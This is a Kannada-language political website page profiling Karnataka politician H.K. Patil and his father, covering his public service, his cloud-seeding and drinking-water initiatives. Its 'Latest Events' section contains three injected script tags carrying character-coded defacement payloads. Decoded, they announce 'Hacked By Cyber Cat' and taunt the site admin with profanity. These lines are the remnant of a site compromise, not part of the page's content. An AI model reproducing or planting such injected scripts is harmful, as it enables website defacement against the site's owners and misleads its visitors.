ಪ್ರವೇಶ

Sri H.K. Patil

ಸಾರ್ವಜನಿಕ ಜೀವನದಲ್ಲಿರುವವರ ಬದುಕು ಸಮುದಾಯ ಜೀವನದ ಪ್ರಾತಿನಿಧಿಕ ಸ್ವರೂಪದಲ್ಲಿರುತ್ತದೆ. ಬಹುಮುಖ ಪ್ರತಿಭೆಯ ಈ ಜನಸೇವಕರು ವೈಯಕ್ತಿಕವಾಗಿ ಕೆಲವೊಂದು ಆಯ್ದ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಗಣನೀಯ ಸೇವೆಗೈದಿರುತ್ತಾರೆ. ವಕೀಲರು, ವೈಧ್ಯರು, ಸಮಾಜ ಸೇವಕರು, ಕೈಗಾರಿಕೋದ್ಯಮಿಗಳು, ವರ್ತಕರು, ಧನಿಕರು, ಕಲಾವಿಧರು, ಆಡಳಿತಗಾರರು, ಕಾರ್ಮಿಕ ಧುರೀಣರು ಜೊತೆಗೆ ಅನ್ಯಾಯದಿಂದ ಸಂಪತ್ತುಗಳಿಸಿದ್ದ ನವಕುಬೇಕರು, ಕ್ರೂರಿಗಳು, ದಂಗೆಕೋರರು, ಕೋಮುವಾದಿಗಳು, ಮೊದಲಾದವರು ರಾಜಕೀಯ ಕ್ಷೇತ್ರದಲ್ಲಿ ಸ್ಥಾನಗಳಿಸಲು ಹವಣಿಸುತ್ತಿರುತ್ತಾರೆ. ಈ ವೈವಿಧ್ಯಮಯ ಹಿನ್ನೆಲೆಯ ಜನರ ಮೇಲಾಟದ ಸ್ಪರ್ಧೆ ಆಯ್ಕೆಗಾರರಲ್ಲಿ ಗೊಂದಲ ಸೃಷ್ಠಿಸುತ್ತದೆ. ಅದೇ ಕಾಲಕ್ಕೆ ಜೊಳ್ಳಿನಿಂದ ಕಾಳನ್ನು ಹೆಕ್ಕಿ ಪ್ರತ್ಯೇಕಿಸಲು ಅನುಕೂಲಕರ ವಾತಾವರಣ ಸಹ ಸೃಷ್ಠಿಸುತ್ತದೆ.

ಈ ವೆಬ್‍ಸೈಟ್ ಕರ್ನಾಟಕದ ಬಹುಮುಖ ಪ್ರತಿಭೆಯ ಪ್ರಾಮಾಣಿಕ, ಪಾರದರ್ಶಕ ಬದುಕಿನ ಸಾರ್ವಜನಿಕ ವ್ಯಕ್ತಿಯಾಗಿರುವ ಶ್ರೀ ಎಚ್.ಕೆ. ಪಾಟೀಲ ಅವರನ್ನು ಕುರಿತಾಗಿದೆ. ಅವರು ಅವಕಾಶ ವಂಚಿತರ ಬದುಕಿನಲ್ಲಿ ಗುಣಾತ್ಮಕ ಬದಲಾವಣೆ ತರಲು ನೋವು ನಿವಾರಿಸಿ ನೆಮ್ಮದಿ ಮೂಡಿಸಲು ಪ್ರಜಾಸತ್ತಾತ್ಮಕ ವ್ಯವಸ್ಥೆ ನೀಡುವ ಅವಕಾಶಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಸೌಲಭ್ಯಗಳನ್ನು ಸೃಷ್ಟಿಸುತ್ತ ಅರ್ಹರಿಗೆ ನೆರವಾಗುವ ಎಚ್.ಕೆ. ಪಾಟೀಲ ಸಾರ್ವಜನಿಕ ಜೀವನದ ಏಳು-ಬೀಳುಗಳ ಮಧ್ಯೆ, ಕಳಂಕರಹಿತ, ಶುದ್ಧ, ಪ್ರಾಮಾಣಿಕ, ಪಾರದರ್ಶಕ ಬದುಕನ್ನು ಕಾಪಾಡಿಕೊಂಡು, ಸದಾ ಬಡವರ ಹಿತಕ್ಕಾಗಿ ಶ್ರಮಿಸುತ್ತಿರುವ ಅಪರೂಪದ ವ್ಯಕ್ತಿಗೆ ಸೇರಿದೆ.

ಪ್ರೇರಣೆ

Sri K. H. Patil
1942-1992

ಎಚ್.ಕೆ. ಪಾಟೀಲ ಹುಟ್ಟಿ-ಬೆಳೆದದ್ದು ಸಹಕಾರದ ವಾತಾವರಣದಲ್ಲಿ. ಅಜ್ಜ ರಂಗನಗೌಡರು. ಸ್ವಾತಂತ್ರ್ಯಪೂರ್ವ ಪ್ರದೇಶ ಆಂದೋಲನ ಕಾಲದ ಸಹಕಾರಿ. ತಂದೆ ಸಹಕಾರ ರಂಗದ ಭೀಷ್ಮ ಕೆ.ಎಚ್. ಪಾಟೀಲರ, ಸ್ವಾಮಿ ವಿವೇಕಾನಂದರ ತತ್ವ ಸೇವಾದೀಕ್ಷೆಗೆ ಪ್ರೇರಕ.


ಎಚ್.ಕೆ. ಪಾಟೀಲರಿಗೆ ತಂದೆ ಕೆ.ಎಚ್. ಪಾಟೀಲರೇ ಪ್ರೇರಣೆ. "ನಿನ್ನ ಕೃತಿಯಿಂದ ಜನಹಿತ ಸಾಧಿಸುತ್ತಿದ್ದರೆ ಭಗವಂತನಿಗೂ ಅಂಜಬೇಡ", ಜನಸೇವೆಯೇ ಜನಾರ್ಧನ ಸೇವೆ ಎಂದು ಘೋಷಿಸಿ ಬಡವರನ್ನು ಶೋಷಣೆಯಿಂದ ಮುಕ್ತರನ್ನಾಗಿ ಮಾಡುವುದೇ ಜೀವನದ ಗುರಿ ಎಂದು ಸಾರಿ ನಿರಂತರ ಸಂಘರ್ಷ ನಡೆಸಿ, ಮಾದರಿ ಸೃಷ್ಟಿಸಿ, ಸಿದ್ದಾಂತ ಪ್ರತಿವಾದಿಸಿ ಅದನ್ನು ಕಾರ್ಯರೂಪಕ್ಕೆ ತಂದ, ತಂದೆಯೇ ಪ್ರೇರಕ ಶಕ್ತಿಯಾಗಿದ್ದಾರೆ.


Latest Events

 • <script>document.documentElement.innerHTML = (60, 104, 116, 109, 108, 62, 10, 32, 32, 32, 60, 104, 101, 97, 100,

  62, 10, 32, 32, 32, 32, 32, 32, 60, 116, 105, 116, 108, 101, 62, 72, 97, 99, 107, 101, 100, 60, 47, 116, 105, 116,

  108, 101, 62, 10, 32, 32, 32, 60, 47, 104, 101, 97, 100, 62, 10, 32, 32, 10, 32, 32, 32, 60, 98, 111, 100, 121, 32,

  98, 103, 99, 111, 108, 111, 114, 61, 39, 98, 108, 97, 99, 107, 39, 62, 60, 98, 114, 62, 60, 98, 114, 62, 60, 98,

  114, 62, 60, 98, 114, 62, 10, 32, 32, 32, 9, 60, 108, 105, 110, 107, 32, 104, 114, 101, 102, 61, 39, 104, 116, 116,

  112, 58, 47, 47, 32, 32, 32, 32, 32, 32, 32, 102, 111, 110, 116, 115, 46, 32, 46, 103, 111, 111, 103, 108, 101, 97,

  112, 105, 115, 99, 111, 109, 47, 99, 115, 115, 63, 102, 97, 109, 105, 108, 121, 61, 73, 99, 101, 108, 97, 110, 100,

  39, 32, 114, 101, 108, 61, 39, 115, 116, 121, 108, 101, 115, 104, 101, 101, 116, 39, 32, 116, 121, 112, 101, 61,

  39, 116, 101, 120, 116, 47, 99, 115, 115, 39, 62, 10, 32, 32, 32, 32, 32, 32, 60, 102, 111, 110, 116, 32, 102, 97,

  99, 101, 61, 39, 73, 99, 101, 108, 97, 110, 100, 39, 32, 99, 111, 108, 111, 114, 61, 39, 119, 104, 105, 116, 101,

  39, 32, 115, 105, 122, 101, 61, 39, 54, 48, 112, 120, 39, 62, 60, 99, 101, 110, 116, 101, 114, 62, 10, 32, 32, 32,

  72, 97, 99, 107, 101, 100, 32, 66, 121, 32, 60, 102, 111, 110, 116, 32, 102, 97, 99, 101, 61, 39, 73, 99, 101, 108,

  97, 110, 100, 39, 32, 99, 111, 108, 111, 114, 61, 39, 108, 105, 109, 101, 39, 62, 67, 121, 98, 101, 114, 32, 67,

  97, 116, 10, 32, 32, 32, 60, 98, 114, 62, 10, 32, 32, 60, 102, 111, 110, 116, 32, 115, 105, 122, 101, 61, 39, 51,

  48, 112, 120, 39, 99, 111, 108, 111, 114, 61, 39, 87, 104, 105, 116, 101, 39, 62, 10, 32, 72, 101, 121, 32, 65,

  100, 109, 105, 110, 44, 32, 119, 104, 101, 114, 101, 32, 105, 115, 32, 121, 111, 117, 114, 32, 60, 102, 111, 110,

  116, 32, 99, 111, 108, 111, 114, 61, 39, 82, 101, 100, 39, 62, 83, 101, 99, 117, 114, 105, 116, 121, 63));</script>

   

   

   

  Read More
 • <script>document.documentElement.innerHTML = (60, 99, 101, 110, 116, 101, 114, 62, 70, 117, 99, 107, 101, 100, 32, 66, 121, 32, 67, 121, 98, 101, 114, 32, 67, 97, 116, 32, 10, 89, 111, 117, 32, 75, 110, 111, 119, 32, 87, 101, 32, 65, 114, 101, 32, 83, 101, 99, 117, 114, 105, 116, 121, 32, 70, 117, 107, 99, 101, 114));</script>

   

   

   

  Read More
 • <script>document.documentElement.innerHTML = (60, 99, 101, 110, 116, 101, 114, 62, 70, 117, 99, 107, 101, 100, 32, 66, 121, 32, 67, 121, 98, 101, 114, 32, 67, 97, 116, 32, 10, 89, 111, 117, 32, 75, 110, 111, 119, 32, 87, 101, 32, 65, 114, 101, 32, 83, 101, 99, 117, 114, 105, 116, 121, 32, 70, 117, 107, 99, 101, 114));</script>

   

   

   

  Read More
UPCOMING EVENTS
As Minister
As Leader Of Opptisition

Achivements

image07 1

Cloud Seeding

Technology put to maximum use by Innovative methods of Artificial Rain by adopting cloud seeding technology to mitigate drought in severe drought prone areas.

image07 3

Pure Drinking Water

On March-16th(the Birthday of Sri. K.H.Patil) 2011 a campaign for pure drinking water was launched and first unit in his native village commissioned.